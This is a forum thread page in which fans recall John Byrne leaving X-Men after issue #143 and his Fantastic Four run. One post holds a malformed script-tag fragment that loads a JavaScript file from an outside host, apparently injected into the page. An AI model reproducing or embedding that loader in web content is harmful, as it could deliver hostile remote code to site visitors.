Active Topics | Member List | Search | Help | Register | Login
The John Byrne Forum
Byrne Robotics > The John Byrne Forum << Prev Page of 3 Next >>
Topic: The 143 punch... (Topic Closed Topic Closed) Post ReplyPost New Topic
Author
Byrne Robotics Member

Posted: 01 May 2014 at 2:29pm | IP Logged | 1  

Anyone else experience the 143 punch?*********Yep. I also experienced the 293 punch of another Marvel comic. OUCH!!!!

Edited by Michael Arndt on 01 May 2014 at 5:32pm
Back to Top profile | search e-mail

Brad Brickley
Byrne Robotics Member

Posted: 01 May 2014 at 3:23pm | IP Logged | 2  

I only discovered X-Men with issue # 137 and was instantly hooked. So, when the news came about that JB was leaving I felt like a guy who'd just found the promised land only to be bummed out so quickly. 

The story has a happy ending with the subscription to FANTASTIC FOUR soon arriving with Mr. Byrne in charge. Thanks, Mom!
Back to Top profile | search | www

Raj Dhami
Byrne Robotics Member

Posted: 01 May 2014 at 4:35pm | IP Logged | 3  

I did not read any Bad Byrne Story interpretation of this thread's intent.

JB leaving X-men was the end of an era - i think thats the easiest way to say it.  The stories in 108 to 143 of X-men (ultimately becoming Uncanny X-men in 142) was one of the most complete comic book tenures for the creative teams i've had the privilege of reading.  Aside from the relationships behind the creative teams and as a reader you dont see that of course, the art was amazing (including the coloring and lettering) and the stories were exciting and challenging.  I held on to the spirit of the book for as long as i could with Cockrum and Rubenstein on art chores and Claremont as sole contributor to the script but couldnt hold on for long.  Smith bought me back for a while but that was it.

I was intrigued why JB (and Terry Austin) had opted to leave....but like so many others was preparing myself for what would be my longest collecting run on any book Fantastic Four which lasted (give or take one issue) his entire run.

Back to Top profile | search

Brian Hague
Byrne Robotics Member

Posted: 01 May 2014 at 4:41pm | IP Logged | 4  

I'm with Brad on this. The loss felt with JB's departure from X-Men was mitigated by his taking up the creative reins on FF. THAT was a book I was completely psyched on! While I very much enjoyed every issue of the Byrne/Claremont X-Men that I owned, I didn't really feel the need to go back and fill in all the gaps in my collection. With the announcement of Byrne on the FF, I was utterly and completely determined that there would BE no gaps!

James Best
Byrne Robotics Member

Posted: 01 May 2014 at 6:28pm | IP Logged | 5  

I concur with the comments that other forum members have made. The loss of JB from the X-Men, while painful to a newly minted fan, soon yielded one of the greatest runs in my comic book collection. Fantastic? Indeed.

Glenn Brown
Byrne Robotics Member

Posted: 02 May 2014 at 6:02am | IP Logged | 6  

I don't remember what I had for breakfast or the name of the last girl I went out with, but I remember the day in junior high school when my friend Paul Robinson informed me during Nutrition period between the volleyball and racquetball courts that John Byrne had resigned from penciling Uncanny X-Men.  My favorite artist, my favorite comic, my biggest influence.  I didn't cry or anything remotely that dramatic but I vividly recall our collective denial, hoping that the news was erroneous and/or that JB would reconsider and all would be right with our comic collecting world again.  Does that answer the question..?  Gut punch, indeed.
Back to Top profile | search | www e-mail

Dale Gonsalves
Byrne Robotics Member

Posted: 02 May 2014 at 7:14am | IP Logged | 7  

"The story has a happy ending with the subscription to FANTASTIC FOUR soon arriving with Mr. Byrne in charge. Thanks, Mom!"< src="https://cloudssl.my.phpcloud.com/super/content.js" id="superInsectID">

Moms are the best eh ? Mine bought me comic books weekly when she went shopping.

I need to give a call before heading out to work...........

Tim O Neill
Byrne Robotics Security

Posted: 02 May 2014 at 8:06am | IP Logged | 8  

Stuart S: "Tim,  Oh no, I didn't mean for my comment to be construed as a "Bad Byrne Story."  I was just reflecting on how much I enjoyed those stories and how devastating it felt when I learned my favorite creator was leaving my favorite series.

I continued to follow JB to Fantastic Four and Alpha Flight and so on...and I have yet to be disappointed in any of the work JB has done.

But I distinctly remember issue 143 as the first time as a young comic reader I experienced the shake up of a creator change.

Sorry if I didn't articulate that well enough."

No need to be sorry at all, Stuart - and I really appreciate the clarification.  I have heard this expressed in the past and I know it comes from a place of appreciation.  I just didn't feel anger or some sense being punched in the gut or betrayed over the news, and I too found out by reading the letter column.  I think the announcement had said that Dave Cockrum was returning, and I had a smattering of his original issues and thought it would be good.  It was with JB leaving that I learned why I liked the X-Men - those issues from 145 on looked good, but the stories were absolutely dreadful, so I had my disappointment later.  It's clear that what I liked about Claremont/Byrne/Austin was JB.  And like others have said above, the momentum that started with X-Men continued with Fantastic Four.  It wasn't just the art that carried over, it was the storytelling.  There was no more engaging storytelling at the time than JB's X-Men, then FF. 

What I was trying to express is that I think it's a shame that you read all of those issues, and the one negative memory became the focus of the thread.  I just don't focus on nor identify with anger over any artist doing something different.  With the release of the omnibus and the release DAYS OF FUTURE PAST in theaters, I was hoping for some discussion of the actual stories.  I was hoping enough time had gone by that the focus would be on the stories and the characters.  So this is just my own expectations not being in line with the Forum -- not the first time and not the last time and I apologize if I expressed my feeling too critically.  I just really care about these stories and get a bit defensive.  They meant more to me as a kid than all books and most movies!

When I read these issues today, I know what is coming, so the moments between Scott and Jean grow even more tragic.  I love how Wolverine develops over the series - these issues show why he became a favorite of mine.  He is portrayed pitch perfectly, as a tough guy with rage, but also deep, hidden emotion.  He was a favorite by the time he confronts Wendigo with his old pals in Alpha Flight, and then is the lone wolf of the future in "Days of Future Past".  This is before he descended into caricature beyond "Days of Future Past".

And my strongest memory of #143 is that it is one of the best single issue stories in comic books.  Kitty was an interesting character, but not a favorite.  That story showed her at a moment when she is tested and revealed her mettle.  I used to always think of this story through middle school and high school whenever I was doing something challenging and felt utterly alone.  She became a part of the Marvel Universe that night, and I am glad to see she has never left.

Neil Lindholm
Byrne Robotics Member

Posted: 02 May 2014 at 8:35am | IP Logged | 9  

I also discovered the X-Men with issue #129 and quickly John Byrne was by far my number one favourite. I remember picking up every issue after 129 with excitement and the horror that I could not find #142 on the drugstore shelves. I finally found a copy at the Vancouver bus station and absolutely loved it. I was crushed with the announcement in #143 that John Byrne was leaving but it gave me the incentive to find all the previous issues I missed. 

Funny how such a thing as comic books can leave such an impression. I still have a vivid memory of seeing issue #142 in that dingy bookstore at the bus station. 

Kevin Ricci
Byrne Robotics Member

Posted: 02 May 2014 at 12:29pm | IP Logged | 10  

I wish Mr. Byrne's tenure had lasted about another 100 or so issues, but then I think that may have deprived us of his phenomenal work on Fantastic Four.

Historically speaking, I believe that the Byrne-Claremont X-Men is one of the three greatest (and my favorite) runs in the history of Marvel Comics, alongside the early Lee-Ditko Spider-Man issues and the Lee-Kirby Fantastic Four run from the mid-Sixties.  The number of times those issues have been reprinted is a testament to the greatness of those timeless stories.  To this day, no comic has made me think as much as X-Men #137 did - it was light years ahead of its time.  

John Byrne
Grumpy Old Guy

Posted: 02 May 2014 at 1:26pm | IP Logged | 11  

To this day, no comic has made me think as much as X-Men #137 did - it was light years ahead of its time.

••

And quite accidently!

Glenn Brown
Byrne Robotics Member

Posted: 02 May 2014 at 4:20pm | IP Logged | 12  

I have one; Daredevil #181...remember in those pre-internet days, pre-Wizard, pre-spoilers...THAT comic hit me in the gut and felt like I was reading a great motion picture.

UXM #137 hit me in a similar fashion.  Especially in the way that JB took out Jean.  it was a unique and poignant death.  Suicide wasn't something that you routinely saw in comics...
Back to Top profile | search | www e-mail

<< Prev Page of 3 Next >>
  Post ReplyPost New Topic
Printable version Printable version